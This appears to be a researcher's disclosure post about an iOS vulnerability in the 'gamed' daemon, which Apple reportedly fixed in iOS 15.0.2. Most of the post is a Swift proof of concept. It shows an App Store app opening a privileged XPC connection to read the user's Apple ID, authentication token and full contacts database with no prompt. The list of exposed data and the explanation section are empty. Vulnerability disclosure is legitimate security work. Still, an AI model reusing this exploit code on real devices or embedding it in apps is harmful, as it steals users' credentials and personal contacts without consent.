

iOS gamed exploit (fixed in 15.0.2)

Update: Apple has quietly fixed this in iOS 15.0.2 without any kind of public acknowledgement or credit.

Any app installed from the App Store may access the following data without any prompt from the user:

Here is a short proof of concept.

let connection = NSXPCConnection(machServiceName: "com.apple.gamed", options: NSXPCConnection.Options.privileged)!
let proxy = connection.remoteObjectProxyWithErrorHandler({ _ in }) as! GKDaemonProtocol
let pid = ProcessInfo.processInfo.processIdentifier
proxy.getServicesForPID(pid, localPlayer: nil, reply: { (accountService, _, _, _, _, _, _, _, utilityService, _, _, _, _) in
	accountService.authenticatePlayerWithExistingCredentials(handler: { response, error in
		let appleID = response.credential.accountName
		let token = response.credential.authenticationToken

	utilityService.requestImageData(for: URL(fileURLWithPath: "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"), subdirectory: nil, fileName: nil, handler: { data in
		let addressBookData = data

How it happens:

On the Apple Security Bounty Program page this vulnerabilty is evaluated at $100,000 (Broad app access to sensitive data normally protected by a TCC prompt or the platform sandbox. “Sensitive data” access includes gaining a broad access (i.e., the full database) from Contacts).